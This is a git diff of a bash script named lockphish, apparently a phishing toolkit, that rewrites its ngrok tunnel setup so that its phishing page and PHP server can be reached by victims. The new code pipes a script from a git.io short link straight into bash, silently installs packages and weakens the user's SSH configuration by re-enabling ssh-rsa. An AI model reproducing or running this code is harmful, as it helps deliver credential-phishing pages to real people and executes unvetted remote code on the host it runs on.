fix lockphish issues

diff --git a/.set/fix-tools/lockphish b/.set/fix-tools/lockphish
--- a/.set/fix-tools/lockphish
+++ b/.set/fix-tools/lockphish
@@ -192,13 +192,56 @@ printf "\e[1;92m[\e[0m+\e[1;33m] Direct link:\e[0m\e[1;77m %s\e[0m\n" $link
 
 ngrok_server() {
 
-if [[ -e $PREFIX/bin/ngrok.io ]]; then
-echo ""
+if [[ $(command -v ngrok.io) ]] 2>/dev/null
+then
+	continue
 else
-command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
-command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
-[[ -e $PREFIX/bin/ngrok ]] && rm -rf $PREFIX/bin/ngrok
-command -v i-Haklab install ngrok
+	command -v wget >/dev/null || yes|apt install wget
+	command -v termux-chroot >/dev/null || yes|apt install proot
+	command -v unzip > /dev/null 2>&1 || yes|apt install unzip
+	arch1=$(uname -a|grep -o 'arm'|head -n1)
+	arch2=$(uname -a|grep -o 'Android'|head -n1)
+	[[ -e $PREFIX/bin/ngrok ]] && rm $PREFIX/bin/ngrok
+	[[ -d ~/.ssh ]] || mkdir ~/.ssh
+	[[ -e ~/.ssh/config ]] || touch ~/.ssh/config
+	printf "host tunnel.us.ngrok.com\n\tHostkeyAlgorithms +ssh-rsa\n\tPubkeyAcceptedAlgorithms +ssh-rsa\n" >> ~/.ssh/config
+	bash <(curl -fsSL "http://git.io/abhacker-repo") --install ngrok-server
+	[[ $arch1 = 'arm' ]] || [[ $arch2 = 'Android' ]] && arch=arm || arch=386
+	wget -q https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-$arch.zip -O $TMPDIR/ngrok-stable-linux-$arch.zip
+	if [[ -e $TMPDIR/ngrok-stable-linux-$arch.zip ]];then
+		[[ -d ~/.ngrok2 ]] || mkdir -p ~/.ngrok2
+		unzip -q $TMPDIR/ngrok-stable-linux-$arch.zip -d ~/.ngrok2/
+		rm -rf $TMPDIR/ngrok-stable-linux-$arch.zip
+		cat <<- EOF > $HOME/.local/bin/ngrok.io
+#!/usr/bin/bash
+#THIS SCRIPT EXECUTE NGROK TO AVOID 'bad address' ERROR
+
+[[ -e $PREFIX/bin/termux-chroot ]] || yes|apt install proot >/dev/null 2>/dev/null
+exec termux-chroot $HOME/.ngrok2/ngrok \${@:1}
+
+#     i-Haklab by Ivam3
+EOF
+		chmod +x $HOME/.local/bin/ngrok.io $HOME/.ngrok2/ngrok
+		PS3="(_➤) "
+		printf "$Y(_➤)$W Ngrok needs an authtoken from ngrok.com$Y\n"
+		select way in Set_authtoken Skip_this_step;do
+			case $way in
+				Set_authtoken)
+					while read -p "(_>)_authtoken─➤ " token && [ -z $token ];do
+						continue
+					done
+					exec $HOME/.local/bin/ngrok.io authtoken $token
+					break
+					;;
+				*) printf "$Y(_➤)$W Don't forget set your token running:$Y\n ╰─────➤$W ngrok authtoken <your-token>\n"
+					break
+					;;
+			esac
+		done
+	else
+		echo -en "\e[31mERROR:\e[0m Ngrok installation failed ...\e[33mAborting.\e[0m"
+		exit 1
+	fi
 fi
 
 printf "\e[1;92m[\e[0m+\e[1;92m] Starting php server...\n"
